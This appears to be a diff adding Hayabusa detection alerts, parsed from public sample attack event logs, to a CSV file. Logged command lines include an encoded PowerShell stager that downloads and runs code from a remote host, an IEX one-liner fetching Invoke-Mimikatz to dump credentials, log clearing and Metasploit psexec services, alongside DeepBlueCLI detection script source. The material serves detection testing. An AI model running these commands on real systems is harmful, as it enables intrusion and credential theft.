+2016-09-21 04:19:26.637 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\cmd.exe"" /C ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x98c | User: IE10WIN7$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: powershell.exe -NoP -sta -NonI -W Hidden -Enc JABXAGMAPQBOAGUAdwAtAE8AQgBKAEUAQwBUACAAUwB5AFMAdABFAG0ALgBOAEUAVAAuAFcAZQBCAEMAbABJAGUATgB0ADsAJAB1AD0AJwBNAG8AegBpAGwAbABhAC8ANQAuADAAIAAoAFcAaQBuAGQAbwB3AHMAIABOAFQAIAA2AC4AMQA7ACAAVwBPAFcANgA0ADsAIABUAHIAaQBkAGUAbgB0AC8ANwAuADAAOwAgAHIAdgA6ADEAMQAuADAAKQAgAGwAaQBrAGUAIABHAGUAYwBrAG8AJwA7ACQAVwBDAC4ASABlAGEAZABFAHIAUwAuAEEAZABEACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAkAHUAKQA7ACQAdwBjAC4AUAByAG8AWABZACAAPQAgAFsAUwBZAFMAVABFAG0ALgBOAGUAdAAuAFcAZQBiAFIARQBxAHUAZQBzAHQAXQA6ADoARABFAGYAQQB1AGwAdABXAGUAYgBQAFIATwBYAHkAOwAkAHcAQwAuAFAAcgBvAFgAeQAuAEMAcgBlAGQARQBOAFQASQBBAEwAUwAgAD0AIABbAFMAWQBzAFQAZQBNAC4ATgBlAFQALgBDAFIAZQBEAGUAbgB0AGkAQQBMAEMAQQBjAGgAZQBdADoAOgBEAGUARgBBAFUAbAB0AE4AZQB0AHcAbwByAEsAQwBSAEUAZABlAG4AVABJAGEAbABTADsAJABLAD0AJwApADAAZABoAEMAeQAxAEoAOQBzADMAcQBZAEAAJQBMACEANwBwAHUAXQBUAHwAdgBWAH0AdABuAFsAQQBRAFIAJwA7ACQAaQA9ADAAOwBbAEMASABBAHIAWwBdAF0AJABCAD0AKABbAGMASABhAHIAWwBdAF0AKAAkAFcAYwAuAEQAbwB3AG4ATABvAGEARABTAHQAUgBpAG4ARwAoACIAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQA5ADgALgAxADQAOQA6ADgAMAA4ADIALwBpAG4AZABlAHgALgBhAHMAcAAiACkAKQApAHwAJQB7ACQAXwAtAGIAWABPAHIAJABLAFsAJABJACsAKwAlACQASwAuAEwARQBuAEcAdABoAF0AfQA7AEkARQBYACAAKAAkAEIALQBqAG8AaQBOACcAJwApAA== | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x11c | User: IEUser | LID: 0x6793c,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:19:26.918 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: cmd /c del ""C:\Users\IEUser\Desktop\launcher.bat"" | Path: C:\Windows\System32\cmd.exe | PID: 0x7d0 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 04:20:19.153 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -s -NoLogo -NoProfile | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc50 | User: IEUser | LID: 0x6793c",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/powersploit-security.evtx
+2016-09-21 12:40:37.088 +09:00,IE10Win7,1102,high,Evas,Security Log Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2016-09-21 12:40:41.865 +09:00,IE10Win7,104,high,Evas,System Log File Cleared,User: IEUser,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,medium,Persis,Possible Metasploit Service Installed,Svc: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MetasploitService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:02.542 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: KgXItsbKgTJzdzwl | Path: %SYSTEMROOT%\duKhLYUX.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Suspicious Service Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,high,Persis,Malicious Service Possibly Installed,Svc: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms,../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.070 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: hgabms | Path: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-system.evtx
+2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2016-09-21 12:41:13.078 +09:00,IE10Win7,4688,medium,,Suspicious Cmd Line_Possible Meterpreter getsystem,Cmd Line: cmd.exe /c echo hgabms > \\.\pipe\hgabms | Path: C:\Windows\System32\cmd.exe | PID: 0x694 | User: IE10WIN7$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_MeterpreterGetSystem.yml,../hayabusa-sample-evtx/DeepBlueCLI/metasploit-psexec-native-target-security.evtx
+2017-06-10 04:21:26.968 +09:00,2016dc.hqcorp.local,4794,high,Persis,Password Change on Directory Service Restore Mode (DSRM) Account,,../hayabusa-rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/4794_DSRM_password_change_t1098.evtx
+2017-06-13 08:39:43.512 +09:00,2012r2srv.maincorp.local,4765,medium,Persis | PrivEsc,Addition of SID History to Active Directory Object,,../hayabusa-rules/sigma/builtin/security/win_susp_add_sid_history.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/4765_sidhistory_add_t1178.evtx
+2017-08-31 01:31:49.876 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:49.908 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious Nishang PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Commandlets,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Suspicious PowerShell Invocations - Specific,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_invocation_specific.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:31:57.382 +09:00,SEC511,4104,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:05.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:07.371 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:13.803 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:13.803 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:13.804 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:32:14.325 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:33:28.096 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:33:34.598 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.PSMessageDetails },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:33:34.600 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.ErrorCategory_Message },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:33:34.601 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{ Set-StrictMode -Version 1; $_.OriginInfo },../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:33:35.043 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:42.201 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[3].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:42.204 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:45.375 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[4].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:45.376 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:48.413 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[5].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:48.416 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:51.394 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"$eventxml.Event.EventData.Data[6].""#text""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:38:51.396 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:17.974 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.563 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.2.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 01:40:20.569 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue <at> backshore <dot> net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } # Ignoring PowerShell event 4014 for now, DeepBlueCLI currently detects its own strings, and hilarity ensues ElseIf ($event.id -eq 4104){ # Check of MessageTotal == 1) if ($eventxml.Event.EventData.Data[1].""#text"" -eq 1){ $eventxml.Event.EventData.Data[1].""#text"" $pscommand=$eventXML.Event.EventData.Data[4].""#text"" $output += (Check-Command $pscommand 9999 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } } function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ 